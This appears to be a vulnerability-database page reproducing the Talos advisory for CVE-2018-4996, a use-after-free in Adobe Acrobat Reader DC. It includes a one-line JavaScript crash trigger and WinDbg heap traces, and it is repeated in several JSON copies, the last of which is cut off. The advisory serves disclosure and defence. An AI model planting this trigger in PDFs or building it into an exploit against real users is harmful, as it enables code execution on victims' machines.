Adobe Acrobat Reader DC Net.Discovery.queryServices Remote Code Execution Vulnerability(CVE-2018-4996)
2018-05-17T00:00:00
ID SSV:97293 Type seebug Reporter Knownsec Modified 2018-05-17T00:00:00
Description
Summary
A specific Javascript script embedded in a PDF file can lead to a pointer to previously freed object to be reused when opening a PDF document in Adobe Acrobat Reader DC 2018.009.20044. With careful memory manipulation, this can potentially lead to sensitive memory disclosure or arbitrary code execution. In order to trigger this vulnerability, the victim would need to open the malicious file or access a malicious web page.
Adobe Acrobat Reader is the most popular and most feature-rich PDF reader. It has a big user base, is usually a default PDF reader on systems and integrates into web browsers as a plugin for rendering PDFs. As such, tricking a user into visiting a malicious web page or sending a specially crafted email attachment can be enough to trigger this vulnerability. Adobe Acrobat Reader DC supports embedded Javascript scripts in the PDF to allow for interactive PDF forms. This give the potential attacker the ability to precisely control memory layout and poses additional attack surface. When executing a following piece of Javascript in a suitable PDF document, a Use-After-Free condition can be triggered:
try{this.Net.Discovery.queryServices( "", {} ); }catch(e){app.alert(e);}
With page heap enabled, this leads to a crash:
eax=17a6acb8 ebx=29464fe0 ecx=29464fe0 edx=771f6c74 esi=2a064fd8 edi=2a064fd0
eip=520e2961 esp=0031f01c ebp=0031f02c iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
Annots!PlugInMain+0x9ea60:
520e2961 ff7318 push dword ptr [ebx+18h] ds:0023:29464ff8=????????
0:000>
The memory pointed to by ebx is freed an invalid, leading to a crash. The method Net.Discovery.queryServices requires privileges, and by default it would be blocked by security permissions. But if the source of the document is trusted, it will execute without problems and lead to a crash. In order to trigger a crash, the first argument needs to be an invalid service name. An empty string suffices.
If we track back the allocations, we can see that pointer in ebx is actually used as this in previous function calls. The pointer in ebx actually comes from an array of size 0x30 allocated at Annots!PlugInMain+0x4c01:
0:000> !heap -p -a eax
address 292c2fd0 found in
_DPH_HEAP_ROOT @ 191000
in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize)
292215b0: 292c2fd0 30 - 292c2000 2000
6b258e89 verifier!AVrfDebugPageHeapAllocate+0x00000229
77276206 ntdll!RtlDebugAllocateHeap+0x00000030
7723a127 ntdll!RtlpAllocateHeap+0x000000c4
77205950 ntdll!RtlAllocateHeap+0x0000023a
62f8ed43 MSVCR120!malloc+0x00000049
55848b02 Annots!PlugInMain+0x00004c01
55848ab1 Annots!PlugInMain+0x00004bb0
55a4ba1b Annots!PlugInMain+0x00207b1a
558e1e29 Annots!PlugInMain+0x0009df28
558e2308 Annots!PlugInMain+0x0009e407
56b4267d EScript!mozilla::HashBytes+0x0004201b
56b275b6 EScript!mozilla::HashBytes+0x00026f54
56b217c2 EScript!mozilla::HashBytes+0x00021160
56b205f0 EScript!mozilla::HashBytes+0x0001ff8e
56b204fb EScript!mozilla::HashBytes+0x0001fe99
56b20442 EScript!mozilla::HashBytes+0x0001fde0
56b09e18 EScript!mozilla::HashBytes+0x000097b6
56b48697 EScript!mozilla::HashBytes+0x00048035
56b4841a EScript!mozilla::HashBytes+0x00047db8
56b47e8d EScript!mozilla::HashBytes+0x0004782b
56b46d7f EScript!mozilla::HashBytes+0x0004671d
56bb622c EScript!double_conversion::DoubleToStringConverter::CreateDecimalRepresentation+0x0005f52d
6023b42f AcroRd32!AIDE::PixelPartInfo::operator=+0x000e3aaf
60179c7d AcroRd32!AIDE::PixelPartInfo::operator=+0x000222fd
601763b1 AcroRd32!AIDE::PixelPartInfo::operator=+0x0001ea31
5ffcd185 AcroRd32!AX_PDXlateToHostEx+0x00159618
5ffcd683 AcroRd32!AX_PDXlateToHostEx+0x00159b16
601799da AcroRd32!AIDE::PixelPartInfo::operator=+0x0002205a
5fc6426f AcroRd32!PDAlternatesGetCosObj+0x0001d51f
5fc2b14b AcroRd32!CTJPEGWriter::CTJPEGWriter+0x000b9c1b
5fba268b AcroRd32!CTJPEGWriter::CTJPEGWriter+0x0003115b
5fba1761 AcroRd32!CTJPEGWriter::CTJPEGWriter+0x00030231
Setting a write access breakpoint on the dword where the final dereferenced pointer is stored reveals where it comes from:
0:000> ba w 4 292c2ffc
0:000> dd 292c2ffc
0:000> g
Breakpoint 6 hit
eax=29d26fe0 ebx=29d26fe0 ecx=55a494c0 edx=771f6c74 esi=28a2cff8 edi=292c2fd0
eip=55a49408 esp=0018c9e4 ebp=0018ca0c iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
Annots!PlugInMain+0x205507:
55a49408 e86941e0ff call Annots!PlugInMain+0x9675 (5584d576)
0:000> dd 292c2ffc
292c2ffc 29d26fe0 ???????? ???????? ????????
0:000> !heap -p -a 29d26fe0
address 29d26fe0 found in
_DPH_HEAP_ROOT @ 191000
in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize)
2a3221d4: 29d26fe0 1c - 29d26000 2000
6b258e89 verifier!AVrfDebugPageHeapAllocate+0x00000229
77276206 ntdll!RtlDebugAllocateHeap+0x00000030
7723a127 ntdll!RtlpAllocateHeap+0x000000c4
77205950 ntdll!RtlAllocateHeap+0x0000023a
62f8ed43 MSVCR120!malloc+0x00000049
55848b02 Annots!PlugInMain+0x00004c01
55848ab1 Annots!PlugInMain+0x00004bb0
558e22e7 Annots!PlugInMain+0x0009e3e6
56b4267d EScript!mozilla::HashBytes+0x0004201b
56b275b6 EScript!mozilla::HashBytes+0x00026f54
56b217c2 EScript!mozilla::HashBytes+0x00021160
56b205f0 EScript!mozilla::HashBytes+0x0001ff8e
56b204fb EScript!mozilla::HashBytes+0x0001fe99
56b20442 EScript!mozilla::HashBytes+0x0001fde0
56b09e18 EScript!mozilla::HashBytes+0x000097b6
56b48697 EScript!mozilla::HashBytes+0x00048035
56b4841a EScript!mozilla::HashBytes+0x00047db8
56b47e8d EScript!mozilla::HashBytes+0x0004782b
56b46d7f EScript!mozilla::HashBytes+0x0004671d
56bb622c EScript!double_conversion::DoubleToStringConverter::CreateDecimalRepresentation+0x0005f52d
6023b42f AcroRd32!AIDE::PixelPartInfo::operator=+0x000e3aaf
60179c7d AcroRd32!AIDE::PixelPartInfo::operator=+0x000222fd
601763b1 AcroRd32!AIDE::PixelPartInfo::operator=+0x0001ea31
5ffcd185 AcroRd32!AX_PDXlateToHostEx+0x00159618
5ffcd683 AcroRd32!AX_PDXlateToHostEx+0x00159b16
601799da AcroRd32!AIDE::PixelPartInfo::operator=+0x0002205a
5fc6426f AcroRd32!PDAlternatesGetCosObj+0x0001d51f
5fc2b14b AcroRd32!CTJPEGWriter::CTJPEGWriter+0x000b9c1b
5fba268b AcroRd32!CTJPEGWriter::CTJPEGWriter+0x0003115b
5fba1761 AcroRd32!CTJPEGWriter::CTJPEGWriter+0x00030231
5fb860d4 AcroRd32!CTJPEGWriter::CTJPEGWriter+0x00014ba4
5fb85688 AcroRd32!CTJPEGWriter::CTJPEGWriter+0x00014158
This 0x1c chunk of memory is subsequently freed but is later reused resulting in a crash:
(c20.5e8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=17d2acb8 ebx=29d26fe0 ecx=29d26fe0 edx=771f6c74 esi=292c2fd8 edi=292c2fd0
eip=558e2961 esp=0018eee8 ebp=0018eef8 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
Annots!PlugInMain+0x9ea60:
558e2961 ff7318 push dword ptr [ebx+18h] ds:0023:29d26ff8=????????
0:000> dd ebx
29d26fe0 ???????? ???????? ???????? ????????
29d26ff0 ???????? ???????? ???????? ????????
29d27000 ???????? ???????? ???????? ????????
29d27010 ???????? ???????? ???????? ????????
29d27020 ???????? ???????? ???????? ????????
29d27030 ???????? ???????? ???????? ????????
29d27040 ???????? ???????? ???????? ????????
29d27050 ???????? ???????? ???????? ????????
With page heap disabled, this stale pointer dereference will usually succeed and result in further memory corruption. With proper memory layout manipulation, it could be abused to achieve arbitrary code execution.
Do note that in order for the PoC to trigger this memory corruption, the PoC file needs to be added to trusted locations list in “Security(Enhanced)” in preferences.
Timeline
2018-01-23 - Vendor Disclosure
2018-05-15 - Public Release
{"id": "SSV:97293", "type": "seebug", "bulletinFamily": "exploit", "title": "Adobe Acrobat Reader DC Net.Discovery.queryServices Remote Code Execution Vulnerability(CVE-2018-4996)", "description": "### Summary\r\nA specific Javascript script embedded in a PDF file can lead to a pointer to previously freed object to be reused when opening a PDF document in Adobe Acrobat Reader DC 2018.009.20044. With careful memory manipulation, this can potentially lead to sensitive memory disclosure or arbitrary code execution. In order to trigger this vulnerability, the victim would need to open the malicious file or access a malicious web page.\r\n\r\n### Tested Versions\r\nAdobe Acrobat Reader DC 2018.009.20044\r\n\r\n### Product URLs\r\nhttps://get.adobe.com/reader/\r\n\r\n### CVSSv3 Score\r\n7.1 - CVSS:3.0/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H\r\n\r\n### CWE\r\nCWE-416: Use After Free\r\n\r\n### Details\r\nAdobe Acrobat Reader is the most popular and most feature-rich PDF reader. It has a big user base, is usually a default PDF reader on systems and integrates into web browsers as a plugin for rendering PDFs. As such, tricking a user into visiting a malicious web page or sending a specially crafted email attachment can be enough to trigger this vulnerability. Adobe Acrobat Reader DC supports embedded Javascript scripts in the PDF to allow for interactive PDF forms. This give the potential attacker the ability to precisely control memory layout and poses additional attack surface. When executing a following piece of Javascript in a suitable PDF document, a Use-After-Free condition can be triggered:\r\n```\r\ntry{this.Net.Discovery.queryServices( \"\", {} ); }catch(e){app.alert(e);}\r\n```\r\n\r\nWith page heap enabled, this leads to a crash:\r\n```\r\neax=17a6acb8 ebx=29464fe0 ecx=29464fe0 edx=771f6c74 esi=2a064fd8 edi=2a064fd0\r\neip=520e2961 esp=0031f01c ebp=0031f02c iopl=0 nv up ei pl zr na pe nc\r\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246\r\nAnnots!PlugInMain+0x9ea60:\r\n520e2961 ff7318 push dword ptr [ebx+18h] ds:0023:29464ff8=????????\r\n0:000>\r\n```\r\n\r\nThe memory pointed to by `ebx` is freed an invalid, leading to a crash. The method `Net.Discovery.queryServices` requires privileges, and by default it would be blocked by security permissions. But if the source of the document is trusted, it will execute without problems and lead to a crash. In order to trigger a crash, the first argument needs to be an invalid service name. An empty string suffices.\r\n\r\nIf we track back the allocations, we can see that pointer in `ebx` is actually used as `this` in previous function calls. The pointer in `ebx` actually comes from an array of size 0x30 allocated at `Annots!PlugInMain+0x4c01`:\r\n```\r\n0:000> !heap -p -a eax\r\n address 292c2fd0 found in\r\n _DPH_HEAP_ROOT @ 191000\r\n in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize)\r\n 292215b0: 292c2fd0 30 - 292c2000 2000\r\n 6b258e89 verifier!AVrfDebugPageHeapAllocate+0x00000229\r\n 77276206 ntdll!RtlDebugAllocateHeap+0x00000030\r\n 7723a127 ntdll!RtlpAllocateHeap+0x000000c4\r\n 77205950 ntdll!RtlAllocateHeap+0x0000023a\r\n 62f8ed43 MSVCR120!malloc+0x00000049\r\n 55848b02 Annots!PlugInMain+0x00004c01\r\n 55848ab1 Annots!PlugInMain+0x00004bb0\r\n 55a4ba1b Annots!PlugInMain+0x00207b1a\r\n 558e1e29 Annots!PlugInMain+0x0009df28\r\n 558e2308 Annots!PlugInMain+0x0009e407\r\n 56b4267d EScript!mozilla::HashBytes+0x0004201b\r\n 56b275b6 EScript!mozilla::HashBytes+0x00026f54\r\n 56b217c2 EScript!mozilla::HashBytes+0x00021160\r\n 56b205f0 EScript!mozilla::HashBytes+0x0001ff8e\r\n 56b204fb EScript!mozilla::HashBytes+0x0001fe99\r\n 56b20442 EScript!mozilla::HashBytes+0x0001fde0\r\n 56b09e18 EScript!mozilla::HashBytes+0x000097b6\r\n 56b48697 EScript!mozilla::HashBytes+0x00048035\r\n 56b4841a EScript!mozilla::HashBytes+0x00047db8\r\n 56b47e8d EScript!mozilla::HashBytes+0x0004782b\r\n 56b46d7f EScript!mozilla::HashBytes+0x0004671d\r\n 56bb622c EScript!double_conversion::DoubleToStringConverter::CreateDecimalRepresentation+0x0005f52d\r\n 6023b42f AcroRd32!AIDE::PixelPartInfo::operator=+0x000e3aaf\r\n 60179c7d AcroRd32!AIDE::PixelPartInfo::operator=+0x000222fd\r\n 601763b1 AcroRd32!AIDE::PixelPartInfo::operator=+0x0001ea31\r\n 5ffcd185 AcroRd32!AX_PDXlateToHostEx+0x00159618\r\n 5ffcd683 AcroRd32!AX_PDXlateToHostEx+0x00159b16\r\n 601799da AcroRd32!AIDE::PixelPartInfo::operator=+0x0002205a\r\n 5fc6426f AcroRd32!PDAlternatesGetCosObj+0x0001d51f\r\n 5fc2b14b AcroRd32!CTJPEGWriter::CTJPEGWriter+0x000b9c1b\r\n 5fba268b AcroRd32!CTJPEGWriter::CTJPEGWriter+0x0003115b\r\n 5fba1761 AcroRd32!CTJPEGWriter::CTJPEGWriter+0x00030231\r\n```\r\nSetting a write access breakpoint on the dword where the final dereferenced pointer is stored reveals where it comes from:\r\n```\r\n0:000> ba w 4 292c2ffc\r\n0:000> dd 292c2ffc\r\n0:000> g\r\nBreakpoint 6 hit\r\neax=29d26fe0 ebx=29d26fe0 ecx=55a494c0 edx=771f6c74 esi=28a2cff8 edi=292c2fd0\r\neip=55a49408 esp=0018c9e4 ebp=0018ca0c iopl=0 nv up ei pl zr na pe nc\r\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246\r\nAnnots!PlugInMain+0x205507:\r\n55a49408 e86941e0ff call Annots!PlugInMain+0x9675 (5584d576)\r\n0:000> dd 292c2ffc\r\n292c2ffc 29d26fe0 ???????? ???????? ????????\r\n0:000> !heap -p -a 29d26fe0\r\n address 29d26fe0 found in\r\n _DPH_HEAP_ROOT @ 191000\r\n in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize)\r\n 2a3221d4: 29d26fe0 1c - 29d26000 2000\r\n 6b258e89 verifier!AVrfDebugPageHeapAllocate+0x00000229\r\n 77276206 ntdll!RtlDebugAllocateHeap+0x00000030\r\n 7723a127 ntdll!RtlpAllocateHeap+0x000000c4\r\n 77205950 ntdll!RtlAllocateHeap+0x0000023a\r\n 62f8ed43 MSVCR120!malloc+0x00000049\r\n 55848b02 Annots!PlugInMain+0x00004c01\r\n 55848ab1 Annots!PlugInMain+0x00004bb0\r\n 558e22e7 Annots!PlugInMain+0x0009e3e6\r\n 56b4267d EScript!mozilla::HashBytes+0x0004201b\r\n 56b275b6 EScript!mozilla::HashBytes+0x00026f54\r\n 56b217c2 EScript!mozilla::HashBytes+0x00021160\r\n 56b205f0 EScript!mozilla::HashBytes+0x0001ff8e\r\n 56b204fb EScript!mozilla::HashBytes+0x0001fe99\r\n 56b20442 EScript!mozilla::HashBytes+0x0001fde0\r\n 56b09e18 EScript!mozilla::HashBytes+0x000097b6\r\n 56b48697 EScript!mozilla::HashBytes+0x00048035\r\n 56b4841a EScript!mozilla::HashBytes+0x00047db8\r\n 56b47e8d EScript!mozilla::HashBytes+0x0004782b\r\n 56b46d7f EScript!mozilla::HashBytes+0x0004671d\r\n 56bb622c EScript!double_conversion::DoubleToStringConverter::CreateDecimalRepresentation+0x0005f52d\r\n 6023b42f AcroRd32!AIDE::PixelPartInfo::operator=+0x000e3aaf\r\n 60179c7d AcroRd32!AIDE::PixelPartInfo::operator=+0x000222fd\r\n 601763b1 AcroRd32!AIDE::PixelPartInfo::operator=+0x0001ea31\r\n 5ffcd185 AcroRd32!AX_PDXlateToHostEx+0x00159618\r\n 5ffcd683 AcroRd32!AX_PDXlateToHostEx+0x00159b16\r\n 601799da AcroRd32!AIDE::PixelPartInfo::operator=+0x0002205a\r\n 5fc6426f AcroRd32!PDAlternatesGetCosObj+0x0001d51f\r\n 5fc2b14b AcroRd32!CTJPEGWriter::CTJPEGWriter+0x000b9c1b\r\n 5fba268b AcroRd32!CTJPEGWriter::CTJPEGWriter+0x0003115b\r\n 5fba1761 AcroRd32!CTJPEGWriter::CTJPEGWriter+0x00030231\r\n 5fb860d4 AcroRd32!CTJPEGWriter::CTJPEGWriter+0x00014ba4\r\n 5fb85688 AcroRd32!CTJPEGWriter::CTJPEGWriter+0x00014158\r\n```\r\nThis 0x1c chunk of memory is subsequently freed but is later reused resulting in a crash:\r\n```\r\n(c20.5e8): Access violation - code c0000005 (first chance)\r\nFirst chance exceptions are reported before any exception handling.\r\nThis exception may be expected and handled.\r\neax=17d2acb8 ebx=29d26fe0 ecx=29d26fe0 edx=771f6c74 esi=292c2fd8 edi=292c2fd0\r\neip=558e2961 esp=0018eee8 ebp=0018eef8 iopl=0 nv up ei pl zr na pe nc\r\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246\r\nAnnots!PlugInMain+0x9ea60:\r\n558e2961 ff7318 push dword ptr [ebx+18h] ds:0023:29d26ff8=????????\r\n0:000> dd ebx\r\n29d26fe0 ???????? ???????? ???????? ????????\r\n29d26ff0 ???????? ???????? ???????? ????????\r\n29d27000 ???????? ???????? ???????? ????????\r\n29d27010 ???????? ???????? ???????? ????????\r\n29d27020 ???????? ???????? ???????? ????????\r\n29d27030 ???????? ???????? ???????? ????????\r\n29d27040 ???????? ???????? ???????? ????????\r\n29d27050 ???????? ???????? ???????? ????????\r\n```\r\n\r\nWith page heap disabled, this stale pointer dereference will usually succeed and result in further memory corruption. With proper memory layout manipulation, it could be abused to achieve arbitrary code execution.\r\n\r\nDo note that in order for the PoC to trigger this memory corruption, the PoC file needs to be added to trusted locations list in \u201cSecurity(Enhanced)\u201d in preferences.\r\n\r\n### Timeline\r\n* 2018-01-23 - Vendor Disclosure\r\n* 2018-05-15 - Public Release", "published": "2018-05-17T00:00:00", "modified": "2018-05-17T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.seebug.org/vuldb/ssvid-97293", "reporter": "Knownsec", "references": [], "cvelist": ["CVE-2018-4996"], "lastseen": "2018-06-08T07:10:05", "viewCount": 6, "enchantments": {"score": {"value": 6.0, "vector": "NONE", "modified": "2018-06-08T07:10:05", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2018-4996"]}, {"type": "talos", "idList": ["TALOS-2018-0517"]}, {"type": "talosblog", "idList": ["TALOSBLOG:C087C65FAEEB57D382F9DD6FD51D549C"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310813233", "OPENVAS:1361412562310813238", "OPENVAS:1361412562310813232", "OPENVAS:1361412562310813230", "OPENVAS:1361412562310813231", "OPENVAS:1361412562310813239"]}, {"type": "nessus", "idList": ["ADOBE_READER_APSB18-09.NASL", "MACOSX_ADOBE_READER_APSB18-09.NASL", "ADOBE_ACROBAT_APSB18-09.NASL", "MACOSX_ADOBE_ACROBAT_APSB18-09.NASL"]}, {"type": "kaspersky", "idList": ["KLA11252"]}], "modified": "2018-06-08T07:10:05", "rev": 2}, "vulnersScore": 6.0}, "sourceHref": "", "sourceData": "", "status": "cve,details"}
{"cve": [{"lastseen": "2021-02-02T06:52:39", "description": "Adobe Acrobat and Reader versions 2018.011.20038 and earlier, 2017.011.30079 and earlier, and 2015.006.30417 and earlier have a Use-after-free vulnerability. Successful exploitation could lead to arbitrary code execution in the context of the current user.", "edition": 8, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-07-09T19:29:00", "title": "CVE-2018-4996", "type": "cve", "cwe": ["CWE-416"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4996"], "modified": "2019-08-21T16:20:00", "cpe": ["cpe:/a:adobe:acrobat_reader_dc:17.011.30079", "cpe:/a:adobe:acrobat_reader_dc:18.011.20038", "cpe:/a:adobe:acrobat_dc:18.011.20038", "cpe:/a:adobe:acrobat_dc:17.011.30079", "cpe:/a:adobe:acrobat_dc:15.006.30417", "cpe:/a:adobe:acrobat_reader_dc:15.006.30417"], "id": "CVE-2018-4996", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-4996", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:adobe:acrobat_reader_dc:15.006.30417:*:*:*:classic:*:*:*", "cpe:2.3:a:adobe:acrobat_dc:17.011.30079:*:*:*:classic:*:*:*", "cpe:2.3:a:adobe:acrobat_reader_dc:18.011.20038:*:*:*:continuous:*:*:*", "cpe:2.3:a:adobe:acrobat_reader_dc:17.011.30079:*:*:*:classic:*:*:*", "cpe:2.3:a:adobe:acrobat_dc:18.011.20038:*:*:*:continuous:*:*:*", "cpe:2.3:a:adobe:acrobat_dc:15.006.30417:*:*:*:classic:*:*:*"]}], "talos": [{"lastseen": "2019-05-29T19:19:55", "bulletinFamily": "info", "cvelist": ["CVE-2018-4996"], "description": "# Talos Vulnerability Report\n\n### TALOS-2018-0517\n\n## Adobe Acrobat Reader DC Net.Discovery.queryServices Remote Code Execution Vulnerability\n\n##### May 15, 2018\n\n##### CVE Number\n\nCVE-2018-4996\n\n### Summary\n\nA specific Javascript script embedded in a PDF file can lead to a pointer to previously freed object to be reused when opening a PDF document in Adobe Acrobat Reader DC 2018.009.20044. With careful memory manipulation, this can potentially lead to sensitive memory disclosure or arbitrary code execution. In order to trigger this vulnerability, the victim would need to open the malicious file or access a malicious web page.\n\n### Tested Versions\n\nAdobe Acrobat Reader DC 2018.009.20044\n\n### Product URLs\n\n<https://get.adobe.com/reader/>\n\n### CVSSv3 Score\n\n7.1 - CVSS:3.0/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H\n\n### CWE\n\nCWE-416: Use After Free\n\n### Details\n\nAdobe Acrobat Reader is the most popular and most feature-rich PDF reader. It has a big user base, is usually a default PDF reader on systems and integrates into web browsers as a plugin for rendering PDFs. As such, tricking a user into visiting a malicious web page or sending a specially crafted email attachment can be enough to trigger this vulnerability. Adobe Acrobat Reader DC supports embedded Javascript scripts in the PDF to allow for interactive PDF forms. This give the potential attacker the ability to precisely control memory layout and poses additional attack surface. When executing a following piece of Javascript in a suitable PDF document, a Use-After-Free condition can be triggered:\n \n \n try{this.Net.Discovery.queryServices( \"\", {} ); }catch(e){app.alert(e);}\n \n\nWith page heap enabled, this leads to a crash:\n \n \n eax=17a6acb8 ebx=29464fe0 ecx=29464fe0 edx=771f6c74 esi=2a064fd8 edi=2a064fd0\n eip=520e2961 esp=0031f01c ebp=0031f02c iopl=0 nv up ei pl zr na pe nc\n cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246\n Annots!PlugInMain+0x9ea60:\n 520e2961 ff7318 push dword ptr [ebx+18h] ds:0023:29464ff8=????????\n 0:000>\n \n\nThe memory pointed to by `ebx` is freed an invalid, leading to a crash. The method `Net.Discovery.queryServices` requires privileges, and by default it would be blocked by security permissions. But if the source of the document is trusted, it will execute without problems and lead to a crash. In order to trigger a crash, the first argument needs to be an invalid service name. An empty string suffices.\n\nIf we track back the allocations, we can see that pointer in `ebx` is actually used as `this` in previous function calls. The pointer in `ebx` actually comes from an array of size 0x30 allocated at `Annots!PlugInMain+0x4c01`:\n \n \n 0:000> !heap -p -a eax\n address 292c2fd0 found in\n _DPH_HEAP_ROOT @ 191000\n in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize)\n 292215b0: 292c2fd0 30 - 292c2000 2000\n 6b258e89 verifier!AVrfDebugPageHeapAllocate+0x00000229\n 77276206 ntdll!RtlDebugAllocateHeap+0x00000030\n 7723a127 ntdll!RtlpAllocateHeap+0x000000c4\n 77205950 ntdll!RtlAllocateHeap+0x0000023a\n 62f8ed43 MSVCR120!malloc+0x00000049\n 55848b02 Annots!PlugInMain+0x00004c01\n 55848ab1 Annots!PlugInMain+0x00004bb0\n 55a4ba1b Annots!PlugInMain+0x00207b1a\n 558e1e29 Annots!PlugInMain+0x0009df28\n 558e2308 Annots!PlugInMain+0x0009e407\n 56b4267d EScript!mozilla::HashBytes+0x0004201b\n 56b275b6 EScript!mozilla::HashBytes+0x00026f54\n 56b217c2 EScript!mozilla::HashBytes+0x00021160\n 56b205f0 EScript!mozilla::HashBytes+0x0001ff8e\n 56b204fb EScript!mozilla::HashBytes+0x0001fe99\n 56b20442 EScript!mozilla::HashBytes+0x0001fde0\n 56b09e18 EScript!mozilla::HashBytes+0x000097b6\n 56b48697 EScript!mozilla::HashBytes+0x00048035\n 56b4841a EScript!mozilla::HashBytes+0x00047db8\n 56b47e8d EScript!mozilla::HashBytes+0x0004782b\n 56b46d7f EScript!mozilla::HashBytes+0x0004671d\n 56bb622c EScript!double_conversion::DoubleToStringConverter::CreateDecimalRepresentation+0x0005f52d\n 6023b42f AcroRd32!AIDE::PixelPartInfo::operator=+0x000e3aaf\n 60179c7d AcroRd32!AIDE::PixelPartInfo::operator=+0x000222fd\n 601763b1 AcroRd32!AIDE::PixelPartInfo::operator=+0x0001ea31\n 5ffcd185 AcroRd32!AX_PDXlateToHostEx+0x00159618\n 5ffcd683 AcroRd32!AX_PDXlateToHostEx+0x00159b16\n 601799da AcroRd32!AIDE::PixelPartInfo::operator=+0x0002205a\n 5fc6426f AcroRd32!PDAlternatesGetCosObj+0x0001d51f\n 5fc2b14b AcroRd32!CTJPEGWriter::CTJPEGWriter+0x000b9c1b\n 5fba268b AcroRd32!CTJPEGWriter::CTJPEGWriter+0x0003115b\n 5fba1761 AcroRd32!CTJPEGWriter::CTJPEGWriter+0x00030231\n \n\nSetting a write access breakpoint on the dword where the final dereferenced pointer is stored reveals where it comes from:\n \n \n 0:000> ba w 4 292c2ffc\n 0:000> dd 292c2ffc\n 0:000> g\n Breakpoint 6 hit\n eax=29d26fe0 ebx=29d26fe0 ecx=55a494c0 edx=771f6c74 esi=28a2cff8 edi=292c2fd0\n eip=55a49408 esp=0018c9e4 ebp=0018ca0c iopl=0 nv up ei pl zr na pe nc\n cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246\n Annots!PlugInMain+0x205507:\n 55a49408 e86941e0ff call Annots!PlugInMain+0x9675 (5584d576)\n 0:000> dd 292c2ffc\n 292c2ffc 29d26fe0 ???????? ???????? ????????\n 0:000> !heap -p -a 29d26fe0\n address 29d26fe0 found in\n _DPH_HEAP_ROOT @ 191000\n in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize)\n 2a3221d4: 29d26fe0 1c - 29d26000 2000\n 6b258e89 verifier!AVrfDebugPageHeapAllocate+0x00000229\n 77276206 ntdll!RtlDebugAllocateHeap+0x00000030\n 7723a127 ntdll!RtlpAllocateHeap+0x000000c4\n 77205950 ntdll!RtlAllocateHeap+0x0000023a\n 62f8ed43 MSVCR120!malloc+0x00000049\n 55848b02 Annots!PlugInMain+0x00004c01\n 55848ab1 Annots!PlugInMain+0x00004bb0\n 558e22e7 Annots!PlugInMain+0x0009e3e6\n 56b4267d EScript!mozilla::HashBytes+0x0004201b\n 56b275b6 EScript!mozilla::HashBytes+0x00026f54\n 56b217c2 EScript!mozilla::HashBytes+0x00021160\n 56b205f0 EScript!mozilla::HashBytes+0x0001ff8e\n 56b204fb EScript!mozilla::HashBytes+0x0001fe99\n 56b20442 EScript!mozilla::HashBytes+0x0001fde0\n 56b09e18 EScript!mozilla::HashBytes+0x000097b6\n 56b48697 EScript!mozilla::HashBytes+0x00048035\n 56b4841a EScript!mozilla::HashBytes+0x00047db8\n 56b47e8d EScript!mozilla::HashBytes+0x0004782b\n 56b46d7f EScript!mozilla::HashBytes+0x0004671d\n 56bb622c EScript!double_conversion::DoubleToStringConverter::CreateDecimalRepresentation+0x0005f52d\n 6023b42f AcroRd32!AIDE::PixelPartInfo::operator=+0x000e3aaf\n 60179c7d AcroRd32!AIDE::PixelPartInfo::operator=+0x000222fd\n 601763b1 AcroRd32!AIDE::PixelPartInfo::operator=+0x0001ea31\n 5ffcd185 AcroRd32!AX_PDXlateToHostEx+0x00159618\n 5ffcd683 AcroRd32!AX_PDXlateToHostEx+0x00159b16\n 601799da AcroRd32!AIDE::PixelPartInfo::operator=+0x0002205a\n 5fc6426f AcroRd32!PDAlternatesGetCosObj+0x0001d51f\n 5fc2b14b AcroRd32!CTJPEGWriter::CTJPEGWriter+0x000b9c1b\n 5fba268b AcroRd32!CTJPEGWriter::CTJPEGWriter+0x0003115b\n 5fba1761 AcroRd32!CTJPEGWriter::CTJPEGWriter+0x00030231\n 5fb860d4 AcroRd32!CTJPEGWriter::CTJPEGWriter+0x00014ba4\n 5fb85688 AcroRd32!CTJPEGWriter::CTJPEGWriter+0x00014158\n \n\nThis 0x1c chunk 